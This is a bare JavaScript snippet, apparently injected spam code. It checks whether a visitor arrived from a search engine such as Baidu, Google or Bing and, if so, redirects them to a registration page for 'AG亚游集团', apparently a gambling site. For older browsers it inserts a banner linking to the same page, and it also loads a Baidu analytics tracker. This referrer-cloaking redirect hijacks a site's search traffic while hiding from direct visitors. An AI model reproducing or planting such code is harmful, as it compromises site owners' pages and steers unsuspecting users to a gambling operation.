var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|sm|qq|so|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="http://www.agvip1997.com/register/";
}





(function(w) {
	if (!("WebSocket" in w && 2 === w.WebSocket.CLOSING)) {
		var d = document.createElement("div");
		d.className = "browsehappy";
		d.innerHTML = '<div style="width:100%;height:100px;font-size:20px;line-height:100px;text-align:center;background-color:#000000;color:#fff;margin-bottom:40px;"><b>您的浏览器，不支持跳转到AG亚游集团，点击 →→ </b><a target="_blank" href="http://www.agvip1997.com/register/" style="background-color:#782490;border-color: #269abc;text-decoration: none;padding: 6px 12px;background-image: none;border: 1px solid transparent;border-radius: 4px;color:#FFEB3B;">访问AG亚游集团</a></div>';
		var f = function() {
				var s = document.getElementsByTagName("body")[0];
				if ("undefined" == typeof(s)) {
					setTimeout(f, 10)
				} else {
					s.insertBefore(d, s.firstChild)
				}
			};
		f()
	}
}(window));
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?a13cdfc1d96f8231716f0d600da7e396";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
